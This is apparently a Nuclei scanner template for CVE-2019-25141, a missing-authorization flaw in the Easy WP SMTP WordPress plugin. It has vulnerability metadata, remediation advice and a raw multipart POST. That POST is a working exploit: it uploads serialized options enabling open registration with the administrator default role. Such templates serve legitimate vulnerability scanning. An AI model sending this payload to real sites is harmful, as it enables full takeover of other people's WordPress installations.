id: CVE-2019-25141

info:
  name: Easy WP SMTP <= 1.3.9 - Missing Authorization to Arbitrary Options Update
  author: DhiyaneshDK
  severity: critical
  description: |
    The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks on the admin_init() function, in addition to insufficient input validation. This makes it possible for unauthenticated attackers to modify the plugins settings and arbitrary options on the site that can be used to inject new administrative user accounts.
  impact: |
    Unauthenticated attackers can modify plugin settings and arbitrary site options to inject new administrative user accounts, leading to complete WordPress site takeover.
  remediation: |
    Upgrade to Easy WP SMTP version 1.4.0 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/84b75f7d-7258-46f6-aee6-b96d70bee264?source=cve
    - https://medium.com/@ayman.abdul.kareem/from-bug-finder-to-risk-advisor-how-security-roles-are-evolving-db1aa86dd137
    - https://nvd.nist.gov/vuln/detail/CVE-2019-25141
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-25141
    cwe-id: CWE-862
    epss-score: 0.04461
    epss-percentile: 0.90201
    cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wp-ecommerce
    product: easy_wp_smtp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/easy-wp-smtp/"
  tags: cve,cve2019,wordpress,wp-plugin,wp,file-upload,easy-wp-smtp,intrusive,vkev,vuln

variables:
  filename: "{{rand_text_alpha(10)}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Connection: keep-alive

        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="action"

        swpsmtp_clear_log
        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="swpsmtp_import_settings"

        1
        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="swpsmtp_import_settings_file"; filename="{{filename}}.txt"
        Content-Type: text/plain

        a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

        --------------------------NCpI6tN3BZW3fz1Y9t2bkf--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(location, "options-general.php?page=swpsmtp_settings")'
        condition: and
# digest: 4a0a00473045022026572e1d8ba689541d5d5dc1bdc75f3481651d57ad4a51cbfbfb8972bbcd689c0221009c9e78954bca623fa2bc8a02e7062ac640cb22cc589505a470b3d215b909be12:922c64590222798bb761d5b6d8e72950